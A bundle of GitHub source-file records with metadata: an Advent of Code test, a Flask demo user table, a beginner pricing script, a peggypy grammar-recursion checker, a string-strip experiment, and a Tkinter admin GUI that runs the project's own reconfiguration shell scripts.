1f77afe28d0cb282cba9d56049db486e0e6d1c6f | d39bf3e0141f39752b40ca420ec7d90204ad4219 | /tests/test_day_02.py | 213be9a1bfceacdaa6696775d1b77d416bee4eb0 | [] | no_license | jasonbrackman/advent_of_code_2017 | 33260d98e1c348b8d249eabe425783568c3db494 | a50e0cf9b628da96cb365744027d1a800557d1c9 | refs/heads/master | 2022-02-18T18:06:58.119383 | 2019-09-12T05:00:02 | 2019-09-12T05:00:02 | 112,784,403 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 957 | py | """
5 1 9 5
7 5 3
2 4 6 8
The first row's largest and smallest values are 9 and 1, and their difference is 8.
The second row's largest and smallest values are 7 and 3, and their difference is 4.
The third row's difference is 6.
In this example, the spreadsheet's checksum would be 8 + 4 + 6 = 18.
What is the checksum for the spreadsheet in your puzzle input?
"""
import pytest
from .. import day_02
@pytest.mark.parametrize('param, expect', [('5 1 9 5', 8),
('7 5 3', 4),
('2 4 6 8', 6)])
def test_min_max_diff(param, expect):
assert day_02.min_max_dif(param) == expect
@pytest.mark.parametrize('param, expect', [('5 9 2 8', 4),
('9 4 7 3', 3),
('3 8 6 5', 2)])
def test_get_divisible_result(param, expect):
assert day_02.get_divisible_result(param) == expect | [
"brackman@gmail.com"
] | brackman@gmail.com |
3a4429b465e6d717885a3200420bd2b15a6199a6 | 9e812c3b6c0bc33cf53da5400436bb340f5beaaf | /Flask_API_v2/With authorization/users.py | 44d869bf497fe457a727d077a73d1dec7e6428f1 | [] | no_license | VladZg/Flask_project | e0230e88efdff3c298e29a4053a29ea9b9d457c4 | cf701b1d55a8f6572ce2fb3fcbf46451ec8ee59b | refs/heads/master | 2023-05-14T12:43:11.648280 | 2021-05-27T13:03:07 | 2021-05-27T13:03:07 | 355,556,742 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | class User(object):
def __init__(self, _id, username, password):
self.id = _id
self.username = username
self.password = password
def __str__(self):
return f"User(id='{self.id}')"
users = [
User(1, 'user1', 'abcxyz'),
User(2, 'user2', 'abcxyz'),
]
username_table = {u.username: u for u in users}
userid_table = {u.id: u for u in users}
| [
"2022zagorodniuk.vv@student.letovo.ru"
] | 2022zagorodniuk.vv@student.letovo.ru |
0b89a9634b9964f9c3b76b14b80b71e32f0ee040 | 0399c5038d53422867b713c80f0b4e06a379ea49 | /v3_horst_resort.py | 98684edd4a5b18bf70e11256827464da2494f9b0 | [] | no_license | pleabargain/python_basic_pizza | e44157eaf64ec2cda8daa9f054eb4187eae5075d | 180a407887aadc9c1b9bb0047551cd39aa573801 | refs/heads/main | 2023-02-10T01:30:58.921666 | 2021-01-03T17:51:53 | 2021-01-03T17:51:53 | 326,415,472 | 0 | 1 | null | 2021-01-03T16:30:54 | 2021-01-03T13:38:12 | Python | UTF-8 | Python | false | false | 1,703 | py | #fancy pizza order
#pizza order
#--- basis price ---
#small pizza = 12
#medium pizza = 15
#medium pizza = 20
# ---price for pepperoni depending on pizza size ---
#pepperoni small = 3
#pepperoni medium = 5
#pepperoni large = 8
# --- price for cheese depending on pizza size ----
#extra_cheese_small =3
#extra_cheese_med =5
#extra_cheese_med =8
from collections import namedtuple
Price = namedtuple("Price", ["standard", "luxury", "VIP"])
#what is the underscore for?
size_list = Price._fields # the underscore is IMPORTANT
basis = Price(1200,1500,2000)
extra_bed = Price(30,50,90)
one_child = Price(40,50,80)
bottle_wine =Price(10,22,33)
spa =Price(150,270,350)
# ask for pizza size
def accept_answer(question, list_of_possible_answers):
"""takes user input and renders it lower case for processing
"""
while True:
answer = input(question + " >>>")
if answer.lower() in [a.lower() for a in list_of_possible_answers]:
return answer.lower()
print("pizza sizes and prices:")
for size in size_list:
print(size, "cost", getattr(basis, size))
size = accept_answer("How big do you want your resort? Type\nstandard\nluxury\nVIP\n", size_list )
cost = getattr(basis, size)
for extra in ("extra_bed","one_child", "bottle_wine","spa"):
#what does locals do?
#what is the notation for[extra]?
#how do I use getattr?
price_for_extra = getattr(locals()[extra], size) # use globals() if inside a class/function
print(extra, " will cost:", price_for_extra)
if accept_answer(f"Do you want {extra}? (yes or no)", ["yes", "no"]) == "yes":
cost += price_for_extra
print("Your total cost is:", cost)
| [
"dennisgdaniels@gmail.com"
] | dennisgdaniels@gmail.com |
62e83d014e06a2aa532f768797c878fd7954ba66 | 6374af29ae984d96f86297f6e51dba40d889ab46 | /src/peggypy/compiler/report_infinite_recursion.py | d51ac3fb55d1a356cb1c8cc0ac1ddbededbc6929 | [] | no_license | thehappycheese/peggypy | 0d2ce02f1de6dfdde6a4cc208886d32531cbe9a3 | e2991f43a3e200e1154b85dfa0740b8ce4168a8c | refs/heads/main | 2023-09-03T03:23:05.292398 | 2021-10-17T16:14:20 | 2021-10-17T16:14:20 | 412,138,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,364 | py |
from typing import Any
from peggypy.compiler.always_consumes_on_success import always_consumes_on_success
from ..grammar_error import Diagnostic, GrammarError
from .utils_and_types.visitor import Visitor
from .utils_and_types.syntax_tree import (
Grammar,
Rule,
Rule_Ref,
Sequence
)
def rule(self:Visitor, node:Rule, options:dict[str, Any]):
options["visited_rules"].append(node.name)
self.visit(node.expression, options)
options["visited_rules"].pop()
def sequence(self:Visitor, node:Sequence, options:dict[str, Any]):
# TODO: Array.every result is unused in original code??? Array.every appears to be used as a way to stop iteration on the first false result
for element in node.elements:
self.visit(element, options)
if not always_consumes_on_success(options["grammar"], element, options):
break
def rule_ref(self:Visitor, node:Rule_Ref, options:dict[str, Any]):
options["backtrace_refs"].push(node)
rule = options["grammar"].findRule(node.name)
if node.name in options["visited_rules"]:
self.visit(rule, options)
options["backtrace_refs"].pop()
else:
options["visited_rules"].push(node.name)
diagnostics:list[Diagnostic] = []
for index, ref in enumerate(options["backtrace_refs"]):
if index + 1 != len(options["backtrace_refs"]):
message = f'Step {index + 1}: call of the rule "{ref.name}" without input consumption'
else:
message = f"Step {index + 1}: call itself without input consumption - left recursion"
diagnostics.append(Diagnostic(message, ref.location))
raise GrammarError(
f"Possible infinite loop when parsing (left recursion: {options['visited_rules'].join(' -> ')} )",
rule.nameLocation,
diagnostics
)
report_infinite_recusrsion_visitor = Visitor({
"rule" : rule,
"sequence" : sequence,
"rule_ref" : rule_ref
})
def report_infinite_recusrsion(grammar:Grammar, options:dict[str, Any]):
"""
Reports left recursion in the grammar, which prevents infinite recursion in
the generated parser.
Both direct and indirect recursion is detected. The pass also correctly
reports cases like this:
start = "a"? start
In general, if a rule reference can be reached without consuming any input,
it can lead to left recursion.
"""
report_infinite_recusrsion_visitor.visit(grammar, {
**options,
"grammar":grammar,
"visited_rules":[],
"backtrace_refs": []
})
| [
"the.nicholas.archer@gmail.com"
] | the.nicholas.archer@gmail.com |
20dc246337514a94a05d62f9a2151d156f2d4100 | 6dd9e0a01411107799d7d54cfdf0177391c68040 | /python/code_hints_tips/strip_method.py | 2fb1323f9eaff89666fc450594647efd61428e58 | [] | no_license | davidm3591/Code-Cheats-Settings | ce792b2dd2293b16262941966eca564c9c3be9bc | d2ccc9aea174ea3302f84d444b082d261c799b11 | refs/heads/master | 2023-02-24T12:28:57.420551 | 2023-02-20T06:30:18 | 2023-02-20T06:30:18 | 203,030,723 | 0 | 0 | null | 2023-02-20T06:30:20 | 2019-08-18T16:37:15 | Python | UTF-8 | Python | false | false | 379 | py | # python strip method
import re
my_str = "0000000this is string example....wow!!!0000000";
pattern = re.compile(r'0')
# matches = pattern.finditer(my_str)
# matches = pattern.findall(my_str)
matches = pattern.match(my_str)
print(matches)
# print(matches.strip(0))
# count = 0
# for match in matches:
# count += 1
# print(f"{count}: {match}")
print(my_str.strip('0'))
| [
"davidmltz@gmail.com"
] | davidmltz@gmail.com |
00998e3732eae7254bdc0de2feb20ec46c840040 | e04798648c899f4fcf66053b02fe60ce698dc51c | /devel/remote_pilot_control_gui_advanced.stable.py | c29b3a37d9784b8312e889cfd86406b7a2a31935 | [] | no_license | krauspe/rpctl | c2d6dae0a0c3f052f869f6c2c047234aef20ceb4 | 6c177727df85d6dd5c0fc4d1cfbdb7b85ff2d07b | refs/heads/master | 2021-01-21T04:47:05.301167 | 2018-08-21T11:08:27 | 2018-08-21T11:08:27 | 46,799,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,594 | py | #!/usr/bin/env python
#TODO: solve basedir path problem
#TODO: file not found error handling for status_list and target_config list
#DONE: disable "start reconfiguration" button after it has been pressed
#DONE: change default entry in remote fqdn select boxes to "no_change" after end of reconfiguration
#TODO: chosse solution for long lists of resource psps as workaround until creation off different "views" see below..
#DONE -> Using scrolled labels: problem: when header in canvas frame: header scrolls too. header in own frame: it isn'reg_window alligned !
#TODO: create views (resource, remote, status...): possible solutins: tabs, windows, ..
#TODO: improve simulation: admin_get_status_list.sh should create a simulated status with random errors
#TODO: admin_reconfigure_nscs.sh should use the above get status script
from Tkinter import *
from tkFileDialog import askopenfilename,askopenfile
import tkFont
import ScrolledText
import subprocess as sub
import os
import pprint
from MyPILTools import LabelAnimated
# settings
main_window_title = """ 2Step Remote Pilot Control 1.5 (unregistered) """
#main_window_title = """ 2Step Remote Pilot Control Mega Advanced (unregistered) """
about = """
2Step Remote Pilot Control 1.5 (c) Peter Krauspe DFS 11/2015
The expert tool for
Remote Piloting
"""
#mode = "simulate"
mode = "productive"
mode_comment = "as configured"
#basedir = ".."
basedir_abs = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
basedir = os.path.relpath(basedir_abs)
print "basedir = ", basedir
#ext_basedir = os.path.join(basedir, "..", "tsctl2")
ext_basedir = os.path.join(os.path.dirname(basedir_abs),"tsctl2")
#ext_basedir = os.path.join(os.path.dirname(basedir_abs),"tsctl2")
#ext_basedir = os.path.relpath(ext_basedir_abs)
# TODO: get relative path
print "ext_basedir = ", ext_basedir
if not os.path.exists(ext_basedir):
mode = "simulate"
mode_comment = "because %s doesn'reg_window exist !\n" % ext_basedir
imagedir = os.path.join(basedir, "images")
animdir = os.path.join(imagedir, "animated_gifs")
int_bindir = os.path.join(basedir,"scripts")
int_confdir = os.path.join(basedir,"config")
int_vardir = os.path.join(basedir, "var")
ext_bindir = os.path.join(ext_basedir,"bin")
ext_confdir = os.path.join(ext_basedir,"config")
ext_vardir = os.path.join(ext_basedir, "var")
sim_bindir = os.path.join(basedir,"binsim")
cfg = {
"productive":
{"bindir":ext_bindir,
"confdir":ext_confdir,
"vardir":ext_vardir,
"descr": "Production Mode"},
"internal":
{"bindir":int_bindir,
"confdir":int_confdir,
"vardir":int_vardir,
"descr": "Using internal scripts and lists"},
"internal_bin":
{"bindir":int_bindir,
"confdir":ext_confdir,
"vardir":ext_vardir,
"descr": "Using internal scripts and productive lists"},
"simulate":
{"bindir":sim_bindir,
"confdir":int_confdir,
"vardir":int_vardir,
"descr": "Creating and using simulated internal lists"},
}
mode_comment = cfg[mode]["descr"] + '\n' + mode_comment
bindir = cfg[mode]["bindir"]
confdir = cfg[mode]["confdir"]
vardir = cfg[mode]["vardir"]
for dir in [bindir,confdir,vardir]:
print dir
resource_nsc_list_file = os.path.join(vardir,"resource_nsc.list")
target_config_list_file = os.path.join(vardir,"target_config.list")
remote_nsc_list_file = os.path.join(vardir,"remote_nsc.list")
nsc_status_list_file = os.path.join(vardir,"nsc_status.list")
# decoration
logo_filename = 'dfs.gif'
animated_gif_filename = 'airplane13.gif'
# default NOT in animated_gif dir because this can change ...
logo_file = os.path.join(imagedir, logo_filename)
animated_gif_file = os.path.join(imagedir, animated_gif_filename)
duration = 1
#run_shell_opt = "fake"
run_shell_opt = ""
# external commands -> moved into Main class
# todo: einlesen und auswerten
#source ${confdir}/remote_nsc.cfg # providing: subtype, ResourceDomainServers, RemoteDomainServers
# app settings
subtype = "psp"
def newFile():
name = askopenfilename()
print "open: ", name
def About():
print about
def getFileAsList(file):
#return [tuple(line.rstrip('\n').split()) for line in open(file) if not line.startswith('#')]
return [line.rstrip('\n').split() for line in open(file) if not line.startswith('#')]
def getFileAsListOfRow(file, row):
return [line.rstrip('\n').split()[row] for line in open(file) if not line.startswith('#')]
def getTargetConfigList(file):
'''https://docs.python.org/2/library/itertools.html
itertools.izip_longest(*iterables[, fillvalue])
Make an iterator that aggregates elements from each of the iterables.
If the iterables are of uneven length, missing values are filled-in with fillvalue.
Iteration continues until the longest iterable is exhausted. Equivalent to
TODO:
Einlesen von tuples ungleicher laenge mit itertools'''
pass
def saveListAsFile(list,filepath):
print "\nSaving %s\n" % filepath
f = open(filepath, 'w')
for tup in list:
line = ''
for element in tup:
line += ' ' + element
f.write(line + '\n')
f.close()
#print "type(line) = %s\n" % type(line)
def Quit():
print "Quit"
root.quit()
class redirectText(object):
"""http://stackoverflow.com/questions/24707308/get-command-window-output-to-display-in-widget-with-tkinter
http://stackoverflow.com/questions/30669015/autoscroll-of-text-and-scrollbar-in-python-text-box"""
def __init__(self, outtext):
"""Constructor"""
self.output = outtext
def write(self, string):
""""""
self.output.insert(END, string)
self.output.see("end")
class MainApp(Frame):
#def __init__(self, root, *args, **kwargs):
def __init__(self, root=None ):
"""http://stackoverflow.com/questions/6129899/python-multiple-frames-with-grid-manager"""
self.choosen = {}
self.var = {}
self.init_output = "\nConsole output initialized.\n\n" + mode_comment
self.r1 = 0
self.label_status_text_trans = {"available" : "READY", "occupied" : "READY", "unreachable" : "UNREACHABLE !", None: ""}
self.label_operation_mode_text_trans = {"available" : "LOCAL", "occupied" : "REMOTE", "unreachable" : "?", None: ""}
self.label_status_textcol = {"available" : "dark green", "occupied" : "dark green", "unreachable" : "red", None: "lightgrey"}
self.label_operation_mode_textcol = {"available" : "black", "occupied" : "blue", "unreachable" : "red", None: "lightgrey"}
#Frame.__init__(self, master=None,*args, **kwargs)
Frame.__init__(self, root)
# LOGO
self.frame = Frame(root, bg="lightblue")
#self.frame.grid(row=0,column=6)
self.frame.grid(row=0,column=1)
self.logo = PhotoImage(file=logo_file)
Label(self.frame, image=self.logo).grid(row=0,column=1)
# Label(self, fg="dark blue", bg="dark grey", font="Helvetica 13 bold italic", text=explanation).grid(row=0,column=1);
# self.slogan = Button(frame, text="MachDasEsGeht", command=self.writeSlogan).grid(row=0,column=2)
# CONSOLE
self.con_frame = Frame(root, bg="white")
self.con_frame.grid(row=1, column=0)
self.console = ScrolledText.ScrolledText(self.con_frame, bg="white")
self.console.grid(row=1, column=0)
#self.anim = None
self.anim = self.showAnimatedGif(animated_gif_file,duration,1,1)
# redirect stdout
self.stdoutOrig = sys.stdout
self.redir = redirectText(self.console)
sys.stdout = self.redir
#self.console.insert(END, self.output)
# print initial message
print self.init_output
# BUTTONS
n=0
self.con_and_button_frame = Frame(root, bg="lightgrey")
self.con_and_button_frame.grid(row=1, column=1, sticky=W+E+N+S)
Button(self.con_and_button_frame, text="Deploy Configs", command=self.deploy_configs).grid(row=1, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Update Resource PSP List", command=self.update_resource_nsc_list).grid(row=2, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Update Remote Pilot Status", command=self.updateStatus).grid(row=3, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Simulate External Command", command=self.simulateExternalCommand).grid(row=4, column=1, sticky=W+E)
#Label(self.con_and_button_frame, text="").grid(row=4, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Print Remote PSP list", command=self.printRemoteNscList).grid(row=5, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Print Status list", command=self.printNscStatusList).grid(row=6, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Print Resource PSP list", command=self.printResourceNscList).grid(row=7, column=1, sticky=W+E)
Label(self.con_and_button_frame, text="").grid(row=8, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Confirm Remote PSP Choices", command=self.confirmRemotePSPChoices).grid(row=9, column=1, sticky=W+E)
#Label(self.con_and_button_frame, text="").grid(row=10, column=1, sticky=W+E)
Button(self.con_and_button_frame, text="Stop Animation", command=self.stopAnimation).grid(row=10, column=1, sticky=W+E)
self.bt_Start_Reconfiguration = Button(self.con_and_button_frame, text="Start Reconfiguration", command=self.startReconfiguration, state=DISABLED, activebackground="red")
self.bt_Start_Reconfiguration.grid(row=11, column=1, sticky=W+E)
Label(self.con_and_button_frame, text="").grid(row=12, column=1, sticky=W+E)
Button(self.con_and_button_frame,text="QUIT", fg="red",command=self.frame.quit).grid(row=13,column=1, sticky=W+E)
# LIST HEADER
#################
self.canvas_frame = Frame(root, bg="grey")
self.canvas_frame.grid(row=4, column=0)
self.canvas = Canvas(self.canvas_frame, borderwidth=0, background="#ffffff")
self.list_frame = Frame(self.canvas, bg="grey")
self.list_frame.grid(row=4, column=0)
lhwidth = 17
lwidth = 21
# Label(self.list_frame, text="Resource %s " % subtype.upper(), font="-weight bold", width=lwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=0)
# Label(self.list_frame, text="Current FQDN ", font="-weight bold", width=lwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=1)
# Label(self.list_frame, text="Operation Mode", font="-weight bold", width=lwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=2)
# Label(self.list_frame, text="Status", font="-weight bold", width=lwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=3)
# Label(self.list_frame, text="Choose Remote FQDN ", width=23, bg="lightblue", relief=GROOVE).grid(row=2, column=4)
#self.lFont = tkFont.Font(family="Helvetica", size=10)
self.lhFont = tkFont.Font(family="Arial Black", size=11)
self.lFont = tkFont.Font(family="Arial", size=10)
self.optFont = tkFont.Font(family="Arial", size=9)
self.opthFont = tkFont.Font(family="Arial Black", size=9)
Label(self.list_frame, text="Resource %s " % subtype.upper(), font=self.lhFont, width=lhwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=0)
Label(self.list_frame, text="Current FQDN ", font=self.lhFont, width=lhwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=1)
Label(self.list_frame, text="Operation Mode", font=self.lhFont, width=lhwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=2)
Label(self.list_frame, text="Status", font=self.lhFont, width=lhwidth, bg="lightblue", relief=GROOVE).grid(row=2, column=3)
Label(self.list_frame, text="Choose Remote FQDN ", font=self.opthFont, width=20, bg="lightyellow", relief=GROOVE).grid(row=2, column=4)
self.vsb = Scrollbar(self.canvas_frame, orient="vertical", command=self.canvas.yview)
self.canvas.configure(yscrollcommand=self.vsb.set)
self.canvas.create_window((0,0),window=self.list_frame, anchor="nw",tags="self.list_frame")
self.vsb.pack(side="right", fill="y")
self.canvas.pack(side="left",fill="both", expand=True)
self.buildMenu(root)
self.loadLists()
self.ResourceStatus = {} # define explicit dict for resource fqdn status
# LIST | OptionMenu
self.lt_resfqdns = {}
self.lt_curfqdns = {}
self.lt_Status = {}
self.lt_operation_mode = {}
self.lt_newfqdn = {}
self.label_resfqdn = {}
self.label_curfqdn = {}
self.label_status = {}
self.label_operation_mode = {}
self.om = {}
self.new_target_config_list = []
self.r1 = 3
#self.testoptions = ("aaa","bbb","ccc","ddd")
for resfqdn,curfqdn,status in self.nsc_status_list:
self.ResourceStatus[resfqdn] = status
# wenn sich die Anzahl der resfqdns erhoeht fehlen hierfuer labels, daher Neustart noetig !
# Loesung: weitere Lables fuer neue Eintrage erzeugen (nicht in init)
# define tkinter vars
self.lt_resfqdns[resfqdn] = StringVar()
self.lt_curfqdns[resfqdn] = StringVar()
self.lt_Status[resfqdn] = StringVar()
self.lt_operation_mode[resfqdn] = StringVar()
self.lt_newfqdn[resfqdn] = StringVar()
# set initial values
self.lt_resfqdns[resfqdn].set(resfqdn)
self.lt_curfqdns[resfqdn].set(curfqdn)
self.lt_Status[resfqdn].set(self.label_status_text_trans[status]) # translate: available -> LOCAL , occupied -> REMOTE
self.lt_operation_mode[resfqdn].set("")
self.label_resfqdn[resfqdn] = Label(self.list_frame, textvariable=self.lt_resfqdns[resfqdn], font=self.lFont, width=lwidth, relief=GROOVE)
self.label_resfqdn[resfqdn].grid(row=self.r1, column=0, sticky=N+S)
self.label_curfqdn[resfqdn] = Label(self.list_frame, textvariable=self.lt_curfqdns[resfqdn], font=self.lFont, width=lwidth, relief=SUNKEN)
self.label_curfqdn[resfqdn].grid(row=self.r1, column=1, sticky=N+S)
self.label_operation_mode[resfqdn] = Label(self.list_frame, textvariable=self.lt_operation_mode[resfqdn], font=self.lFont, width=lwidth, fg=self.label_status_textcol[status], relief=SUNKEN)
self.label_operation_mode[resfqdn].grid(row=self.r1, column=2, sticky=N+S)
self.label_status[resfqdn] = Label(self.list_frame, textvariable=self.lt_Status[resfqdn], font=self.lFont, width=lwidth, fg=self.label_status_textcol[status], relief=SUNKEN)
self.label_status[resfqdn].grid(row=self.r1, column=3, sticky=N+S)
self.r1 +=1
self.frame.bind("<Configure>", self.onFrameConfigure)
self.updateStatusView()
self.createOptionMENUS("init")
# function for scrolled labels
def onFrameConfigure(self, event):
'''Reset the scroll region to encompass the inner frame'''
self.canvas.configure(scrollregion=self.canvas.bbox("all"),width=880,height=650)
def runShell(self,cmd,opt):
# http://www.cyberciti.biz/faq/python-execute-unix-linux-command-examples/
#cmd = "cat /etc/HOSTNAME"
#cmd = "/opt/dfs/tsctl2/bin/admin_get_status_list.sh"
#print "Running on:\n"
cmd += "; echo ; echo Done."
#cmd = "ls -la"
self.text = ""
self.err_text = ""
if opt == "fake":
print " running shell command:(FAKE !)"
print "\n %s\n" % cmd
else:
print " running shell command:"
print "\n %s\n" % cmd
# p = sub.Popen(cmd,stdout=sub.PIPE,stderr=sub.PIPE)
# output, errors = p.communicate()
# return output, errors
#p = sub.Popen(cmd, shell=True, stderr=sub.PIPE)
self.update_idletasks()
p = sub.Popen(cmd, shell=True, stdout=sub.PIPE, stderr=sub.PIPE)
while True:
out = p.stdout.read(1)
if out == '' and p.poll() != None:
break
if out != '':
# self.text += out
self.redir.write(out)
self.stdoutOrig.write(out)
while True:
err = p.stderr.read(1)
if err == '' and p.poll() != None:
break
if err != '':
# self.err_text += err
self.redir.write(err)
self.stdoutOrig.write(err)
# print self.text
# # print "ERRORS : "
# print self.err_text
#print out
# return out
# sys.stdout.write(out)
# sys.stdout.flush()
# define functions for external shell scripts
def deploy_configs(self):
self.runShell(os.path.join(bindir,"admin_deploy_configs.sh"), run_shell_opt)
def update_status_list(self):
self.runShell(os.path.join(bindir,"admin_get_status_list.sh"), run_shell_opt)
def update_resource_nsc_list(self):
self.runShell(os.path.join(bindir,"admin_get_resource_nsc_list.sh"), run_shell_opt)
def reconfigure_nscs(self):
self.runShell(os.path.join(bindir,"admin_reconfigure_nscs.sh"), run_shell_opt)
def simulateExternalCommand(self):
self.runShell(os.path.join(sim_bindir,"admin_simulate.sh"), run_shell_opt)
# define other functions
def confirmRemotePSPChoices(self):
self.createTargetConfigListFromOptionMENU()
self.createOptionMENUS("update")
def updateStatus(self):
print "updateStatus: "
#print "CURRENTLY DISABLED run external script to update status at that state (force by pressing the button !!)"
self.update_status_list()
self.updateStatusView()
def updateStatusView(self):
# TODO: HIER sollte noch eine aktualisierbare python status abfrage mit differenzierten Status-Meldungen rein,
# TODO: solange wird der status aus der nsc_status_list genommen
#self.stopAnimation()
self.nsc_status_list = getFileAsList(nsc_status_list_file)
for resfqdn,curfqdn,status in self.nsc_status_list:
self.ResourceStatus[resfqdn] = status
self.lt_resfqdns[resfqdn].set(resfqdn)
#self.lt_curfqdns[resfqdn].set(curfqdn.upper())
# upper sieht kacke aus je nach schriftart !
self.lt_curfqdns[resfqdn].set(curfqdn)
self.lt_Status[resfqdn].set(self.label_status_text_trans[status])
self.lt_operation_mode[resfqdn].set(self.label_operation_mode_text_trans[status])
self.label_operation_mode[resfqdn].config(fg=self.label_operation_mode_textcol[status])
self.label_curfqdn[resfqdn].config(fg=self.label_status_textcol[status])
self.label_status[resfqdn].config(fg=self.label_status_textcol[status])
def createOptionMENUS(self,opt):
self.r1 = 3
for resfqdn,curfqdn,status in self.nsc_status_list:
if opt == "update":
self.om[resfqdn].destroy()
self.om[resfqdn] = OptionMenu(self.list_frame, self.lt_newfqdn[resfqdn], *self.max_target_fqdn_list)
self.om[resfqdn].config(width=20, font=self.optFont)
self.om[resfqdn].grid(row=self.r1, column=4, sticky=S)
if opt == "init":
self.lt_newfqdn[resfqdn].set("no change")
#self.lt_newfqdn[resfqdn].set(curfqdn)
self.r1 +=1
def createTargetConfigListFromOptionMENU(self):
print "\nCreating NEW Target config list...\n"
self.new_target_config_list = []
self.target_change_requests = 0
self.bt_Start_Reconfiguration.config(state=DISABLED)
for resfqdn,curfqdn,status in self.nsc_status_list:
newfqdn = self.lt_newfqdn[resfqdn].get()
if newfqdn == "no change":
newfqdn = curfqdn
enable_option = ""
else:
enable_option = "enable_reconfiguration"
self.target_change_requests += 1
print '%s %s %s' % (resfqdn, newfqdn,enable_option )
self.new_target_config_list.append((resfqdn,newfqdn,enable_option))
# Save NEW TARGET CONFIG LIST
saveListAsFile(self.new_target_config_list,target_config_list_file)
# ACTIVATE START RECONFIGURATION BUTTON IF CAHNGES ARE REQUESTED
if self.target_change_requests > 0:
self.bt_Start_Reconfiguration.config(state=ACTIVE)
# print "------------------------\n"
# pp = pprint.PrettyPrinter(indent=4)
# pp.pprint(self.new_target_config_list)
def printTargetConfigList(self):
print "\nTarget config list:\n"
for line in self.target_config_list:
print line
def printResourceNscList(self):
print "\nResource nsc list:\n"
for line in self.resource_nsc_list:
print line
def printRemoteNscList(self):
print "\nRemote nsc list:\n"
for line in self.remote_nsc_list:
print line
def printNscStatusList(self):
print "\nStatus list:\n"
for line in self.nsc_status_list:
print line
def startReconfiguration(self):
print "\nStarting reconfiguration of PSPs ....\n"
self.reconfigure_nscs()
self.bt_Start_Reconfiguration.config(state=DISABLED)
self.createOptionMENUS("init")
#self.output = runShell("dir")
#print self.output
def loadLists(self):
print "Loading Lists ..."
self.nsc_status_list = getFileAsList(nsc_status_list_file)
self.resource_nsc_list = getFileAsList(resource_nsc_list_file)
self.resource_nsc_list_dict = dict(self.resource_nsc_list)
self.remote_nsc_list = getFileAsListOfRow(remote_nsc_list_file, 0)
self.max_target_fqdn_list = [fqdn for fqdn in self.remote_nsc_list] + ["default","no change"]
self.target_config_list = getFileAsList(target_config_list_file)
#print "self.remote_nsc_list : "
#print self.remote_nsc_list
def writeSlogan(self):
print "Alles geht !"
def buildMenu(self, root):
self.menu = Menu(self)
root.config(menu=self.menu)
file_menu = Menu(self.menu)
self.menu.add_cascade(label="File", menu=file_menu)
file_menu.add_command(label="New", command=newFile)
file_menu.add_command(label="Open...", command=self.openAnimatedGifFile)
file_menu.add_separator()
file_menu.add_command(label="Exit", command=Quit)
list_menu = Menu(self.menu)
self.menu.add_cascade(label="List", menu=list_menu)
list_menu.add_command(label="Target Config", command=self.printTargetConfigList)
list_menu.add_command(label="Status", command=self.printNscStatusList)
help_menu = Menu(self.menu)
self.menu.add_cascade(label="Help", menu=help_menu)
help_menu.add_command(label="Register", command=self.inputRegistrationKey)
help_menu.add_command(label="About...", command=About)
# fun stuff
def stopAnimation(self):
self.anim.after_cancel(self.anim.cancel)
self.anim.destroy()
def openAnimatedGifFile(self):
self.stopAnimation() # stop previously or initially opened gif
options = {}
options['defaultextension'] = '.gif'
#options['filetypes'] = [('all files', '.*'), ('text files', '.txt')]
options['filetypes'] = [('gif files', '.gif')]
options['initialdir'] = animdir
options['parent'] = self
options['title'] = "Open a gif file"
with askopenfile(mode='rb', **options) as file:
self.showAnimatedGif(file,duration,1,1)
def showAnimatedGif(self,file,duration,row,column):
#if self.anim:
# self.stopAnimation()
self.anim = LabelAnimated(self.con_frame, file, duration)
self.anim.grid(row=row,column=column)
return self.anim
def inputRegistrationKey(self):
'''inputRegistrationKey'''
print("Open inputRegistrationKey Dialog")
# reg_window = Toplevel(self)
# reg_window.wm_title("Register")
# l = Label(reg_window, text="Type in your registration keys").pack()
#
#
# self.entrytext = StringVar()
# Entry(self.root, textvariable=self.entrytext).pack()
#
# self.buttontext = StringVar()
# self.buttontext.set("Check")
# Button(self.root, textvariable=self.buttontext, command=self.clicked1).pack()
#
# self.label_regkey = Label(self.root, text="")
# self.label_regkey.pack()
# def clicked1(self):
# self.input = self.entrytext.get()
# self.label_regkey.configure(text=self.input)
# print "Print: ", self.input
if __name__ == "__main__":
root = Tk()
#root.geometry("800x600") # mal testen !!
root.title(main_window_title)
main = MainApp(root)
#main.grid(row=0,column=0)
main.grid()
root.mainloop()
root.destroy()
| [
"kit02@peter-krauspe.de"
] | kit02@peter-krauspe.de |
f53804864f185c082fa55966d97ef3aa8d63bf39 | 7b389b68b0dc5106a37f11d1e75c68a57bb55e8f | /different_way_14.py | 594c3eb6cb6eba8c0ca16018a31c1ed33921bd13 | [] | no_license | 2654400439/UCAS_Cryptanalysis_2021 | e25e9d3d7c46c0f1a378174008e28b1a2f350947 | 0c87de136dc479aeeabb457422a571e6162b6aed | refs/heads/main | 2023-08-03T02:37:42.556066 | 2021-09-28T15:49:58 | 2021-09-28T15:49:58 | 411,226,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,010 | py | from collections import Counter
from matplotlib import pyplot as plt
import math
import sys
from tqdm import trange
